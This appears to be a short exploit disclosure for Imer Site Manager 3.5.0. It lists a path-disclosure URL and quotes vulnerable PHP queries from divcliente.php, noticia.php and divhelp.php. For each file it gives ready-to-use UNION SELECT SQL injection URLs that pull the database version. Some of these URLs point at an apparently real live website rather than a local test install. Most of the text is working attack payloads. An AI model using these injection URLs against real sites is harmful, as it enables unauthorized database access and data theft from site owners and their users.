Imer - Site Manager 3.5.0
sourceforge.net/projects/ism-imersiteman/
path disclosure
http://localhost/imer/help/admin_common.php
--------------
divcliente.php
PHP код:
require_once './conecta.php';
require_once './suporte.php';
require_once './arrays.php';
if ($oplcat == '2'){
if ($ople == 'E'){
$pg_usuario = mysql_query("SELECT * FROM swb_usuarios WHERE ID = $idl LIMIT 1");
SQL
rg=on
http://localhost/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,version(),34,35,36,37,38,39,40,41,42,43+--+
http://www.trudelmer.com.br/imer/divcliente.php?oplcat=2&ople=E&idl=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,version(),34,35,36,37,38,39,40,41,42,43+--+
--------------
noticia.php
PHP код:
$pg_noticias = mysql_query("SELECT * FROM swb_noticias WHERE status = 'A' AND ID = $idl LIMIT 1");
SQL
rg=on
http://localhost/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
http://www.trudelmer.com.br/imer/noticia.php?conf_empresa=2&user=1&idl=-3+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
--------------
divhelp.php
PHP код:
require_once './conecta.php';
require_once './suporte.php';
require_once './arrays.php';
if ($oplhlp == 'Y' || $oplhlp == 'N' || $oplhlp == 'R' || $oplhlp == 'L'){
if ($ople == 'E'){
$pg_userhelp = mysql_query("SELECT * FROM livehelp_users WHERE username = '$login' LIMIT 1");
SQL
rg=on
mq=off
http://localhost/imer/divhelp.php?oplhlp=Y&ople=E&&login=hhhh'+union+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,version(),31,32,33 ,34,35,36,37,38,39,40+limit+1+--+